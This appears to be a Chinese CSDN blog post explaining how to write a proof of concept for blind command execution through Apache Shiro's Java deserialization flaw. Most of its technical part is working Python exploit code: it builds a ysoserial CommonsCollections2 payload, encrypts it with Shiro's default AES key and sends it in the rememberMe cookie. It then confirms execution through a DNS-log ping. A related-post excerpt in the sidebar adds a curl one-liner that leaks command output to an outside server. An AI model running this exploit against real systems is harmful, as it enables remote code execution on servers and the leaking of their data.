java poc_无回显命令执行PoC编写指南(Apache Shiro Java反序列化)

最新推荐文章于 2024-04-15 10:04:54 发布
最新推荐文章于 2024-04-15 10:04:54 发布
阅读量627 收藏
点赞数
文章标签: java poc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32058991/article/details/114203179
版权

无回显

漏洞存在与否,无法从web获取到标志性的信息,Java反序列化漏洞即属于该类型。

验证方法

针对无回显的命令执行漏洞,让目标机执行wget、nc或者curl等命令,然后在公网主机监听对应的端口,通过日志来判断命令是否被执行。

该方法可行,不过缺陷有以下几点:

修改了目标机的文件系统

不具有通用性,如windows没有nc、linux没有wget的情况。

涉及到TCP数据传输,执行速度慢

一种更好的方式是使用dns日志来判断命令是否执行,流程如下:

生成一个特殊的域名,如 1dsa3r3.shiro.server.com

构造payload让目标机执行 ping 1dsa3r3.shiro.server.com

登录dns服务后台,如果后台记录了该域名的dns查询记录,即证明目标存在命令执行。

这种方法首先适应了win/unix系统,二者均自带ping命令。而且执行DNS的速度要快于TCP。

tips

使用ping命令的时候有个坑,大部分linux系统执行ping xxxx时候会一直ping下去,而不是win里面执行4次之后退出。

解决方案:使用 ping -n 3 xxx.com || ping -c 3 xxx.com 可以解决该问题并保证兼容性。

实际情况中会遇到很多入口与出口不同的情况,即我们向主机A发送payload,但是主机B执行了我们的ping命令。这时我们dns日志中的IP与A的IP无法匹配,就会造成漏报。

解决方案:为每次验证生成独立、随机的域名,如[random].shiro.xxx.com,在[random]处使用10位随机字符或者递增的数字。这样只要以该域名为准查找日志,即可同时匹配到入口和出口主机IP。

PoC示例

以Apache Shiro Java反序列化远程命令执行漏洞为例。

完整PoC代码

主函数

调用cloudeye接口,设置一个以shiro 为特征组的随机域名,即:[random].shiro.user.dnslog.info

将该域名加入目标机执行的ping命令

使用ping命令生成反序列化payload

requeests以GET请求的Cookie字段发送payload

调用Cloudeye接口查看dns日志,在日志中匹配之前构造的域名

如果访问记录存在,在记录中匹配出口IP

返回入口IP和出口IP

from plugin.cloudeye import CloudEye

def poc(url):

target = 'http://' + url if '://' not in url else url

try:

cloudeye = CloudEye()

domain = cloudeye.getRandomDomain('shiro') # 设置dns特征域名组

rce_command = 'ping -n 3 %s || ping -c 3 %s' % (domain, domain) # 目标机执行的代码

payload = generator(rce_command, JAR_FILE) # 生成payload

requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10) # 发送验证请求

dnslog = cloudeye.getDnsRecord(delay=1)

if domain in dnslog:

msg = url

for each in re.findall(r'client (.*)#', dnslog): # 获取出口ip

msg += ' - ' + each

return msg

except Exception, e:

pass

return False

Payload生成

生成payload的原理在上面链接文章有分析和相应代码,稍加修改,需传入要目标机执行的命令和本地jar的位置:

def generator(command, fp):

if not os.path.exists(fp):

raise Exception('jar file not found!')

popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections2', command],

stdout=subprocess.PIPE)

BS = AES.block_size

pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()

key = "kPH+bIxk5D2deZiIxcaaaA=="

mode = AES.MODE_CBC

iv = uuid.uuid4().bytes

encryptor = AES.new(base64.b64decode(key), mode, iv)

file_body = pad(popen.stdout.read())

base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))

return base64_ciphertext

CloudEye接口

运行效果

批量验证:

0818b9ca8b590ca3270a3433284dd417.png

CloudEye日志:

0818b9ca8b590ca3270a3433284dd417.png

Min Xu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java安全(八)TransformedMap构造POC
weixin_45694388的博客
07-31 1068
上一篇构造了一个了commons-collections的demo package test.org.vulhub.Ser; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; impo
shiro反序列化脚本.zip
07-28
需要用到的俩个文件 ysoserial-master.jar 和 poc.py
在检测RCE漏洞时,判断RCE利用成功的方式有哪些(无回显情况)
weixin_42478365的博客
10-09 2011
第一种使用curl: curl "xxx.xxx.xxx.xxx/$(uname -a | awk '{print $1}')" 这条命令拼接了两处,第一处便是curl下我的一个vps服务器的80端口,第二处是显示内核版本。从服务器的web日志文件中看下效果: 发现操作系统的版本被拼接输出到后面,在面对没有回显的RCE或者CSRF都可以使用这个技巧。 第二种:DNSlog windows: 操作系统 盲注方式 windows %variable% linux variable 反引号 此处使用公网一个
如何编写合格的 PoC 领取 Goby 红队专版
m0_46699477的博客
04-16 3545
前言: Goby已经上了某榜(滑稽)的top10了,足以证明Goby的实用性,众所周知Goby还分为内测版、超级内测版、红队专版等等,其中最强大的莫过于红队专版,但红队版的获取是严格限制的,当然也是有获取方法,这里分享如何通过编写 PoC 获取红队专版。 0x001 准备环境 Goby为PoC编写提交测试方便发布了…姑且叫PoC版。PoC版主要功能为登录后,可以在线提交 PoC,无需再提交到邮箱。 然后还有两个连接,一个是《Goby漏洞编写指南》: https://github.com/gobysec/.
Day103:漏洞发现-漏扫项目篇&Poc开发&Rule语法&反链判断&不回显检测&Yaml生成
qq_61553520的博客
04-15 758
小迪安全-Day103:漏洞发现-漏扫项目篇&Poc开发&Rule语法&反链判断&不回显检测&Yaml生成
CTFshow web入门 web41~web55 命令执行
qq_56815564的博客
04-15 1322
这回是真正意义上的禁用了这些命令了,以前还能通过中间添加一些特殊符号来绕过的,现在是完全不能使用了,毕竟 . 后面跟上一个通配符后,就完全不能在中间加点什么了。简单分析一下,if中的语句第一个是输出GET传入的参数、第二个是执行c的语句后得到的东西赋值给d、第三个是换行后在输出d的内容。但是留下了一个一个或运算符( | )空格不能用可以使用tab键代替,url编码是%09,反正tab是最多是4个空格,多几个空格也不会怎样。说到底,这么多能有回显的函数,也不差cat这一个,形式有这么多,也不差分号这一个。
java-poc:概念证明和Java技巧
04-30
注意: : 优先级警告...使用 Khallware(Java概念验证) 概述 这是一些用Java编写的简单,独立的概念证明。 主题包括: -简单的Java构造,data_types和语言功能 -通用软件设计模式 -计算机科学算法 -各种核心Java技术 -j2ee技术的各种子集 -通用Java
手把手教你JAVA反序列化POC
Ms08067安全实验室
07-20 1929
0x01 前言前面,我们了解了java的序列化机制,也知道在什么情况下会出现漏洞,为了对反序列化漏洞有个更直观的认识,这里就来说一说存在于apache commons-collectio...
java poc_spring系列cve poc编写
weixin_33880392的博客
02-13 1078
本来是自己在有道云笔记的,存粹是为了练习下python代码,也懒得打码了就是自己搭建的个漏测环境,师傅们手下留情.0x01 cve-2018-12731.1 漏洞检测访问目标/users?page=&size=5抓包,修改post包POST /users?page=&size=5 HTTP/1.1Host: 49.235.54.135:24814User-Agent: Mozil...
命令执行poc编写
公众号shadow sock7
06-03 1068
回显的情况下,碰到可能存在的windows和linux平台,可以执行一个不存在的命令,然后报错返回里有Cannot run program即可。 Windows: 结果:
shiro_rce_tool:shiro rce tool 反序列 命令执行 一键工具 回显
04-29
shiro_rce 下载地址:https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip 2021-03-31: 新增自定义或随机useragent randomagent --> random useragent useragent= --> set useragent cookiename= --> default: rememberMe 2020-10-16: 放出来一些功能: 1、spring/tomcat回显执行命令的时候,x=whoami 就行 2、批量检测是否shiro 3、目标服务器不出网的情况下探测 2020-08-21: 新增了cc8 cc9 cc10利用链 新增了输出payload模式,在执行命令的时候输入output=on即可。 参考下面的示例 2020-05-26: 原来的停止服务了,请下载最新版本。
POC编写指南
03-27
转载自Medici.Yan,以真实案例为背景,针对当下主流的漏洞来分析漏洞,并且一步一步编写对应的 PoC
cve-2017-10271-poc.py weblogic反序列化 WLS
01-02
python2.x 最新weblogic反序列化漏洞利用工具 WLS /wls-wsat/CoordinatorPortType
04018717_POC_Project_POC_
09-29
VIVADO 基于VERILOGPOC程序
POC.rar_POC_POC VHDL_VHDL POC_VHDL Printer_poc东南大学
09-24
东南大学学生数字系统设计实验:用VHDL语言编写Printer与CPU互连的接口程序
POC.rar_ handshake vhdl_POC_VHDL POC_handshake vhdl_vhdl handsha
09-23
a parallel output controller(handshake protocol)
直播预告 | 今晚8点 1小时教会使用Java编写POC
Ms08067安全实验室
01-07 114
— 实验室旗下直播培训课程 —来和20000+位同学加入MS08067一起学习吧!
编写Poc:Yapi远程命令执行漏洞
soldi_er的博客
07-12 858
文章目录使用Docker构建Yapi(Ubuntu环境)访问yapi镜像,测试漏洞自动化探测脚本FOFA批量探测(python3)单url探测(python2)参考 使用Docker构建Yapi(Ubuntu环境)   (1)创建mongoDB数据卷: docker volume create mongo_data_yapi   (2)启动MongoDb docker run -d --name mongo-yapi -v mongo_data_yapi:/data/db mongo   (3)从阿里
回显命令执行PoC编写指南(Apache Shiro Java反序列化)
热门推荐
乐枕的家
08-04 1万+
回显命令成功执行与否,无法从web获取到标志性的信息,Java反序列化漏洞及属于该类型。验证方法针对无回显命令执行漏洞,让目标机执行wget、nc或者curl等命令,然后在公网主机监听对应的端口,通过日志来判断命令是否被执行。该方法可行,不过缺陷有以下几点: 修改了目标机的文件系统 不具有通用性,如windows没有nc、linux没有wget的情况。 涉及到TCP数据传输,执行速度慢 一种更好
phar反序列化poc
最新发布
05-21
上述POC中,攻击者创建了一个含有恶意代码的Phar文件,并将其反序列化到`$example`变量中,最后通过`include`语句触发远程代码执行。 相关问题: 1. 什么是Phar文件? 2. 什么是反序列化漏洞? 3. 如何防范Phar反序...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值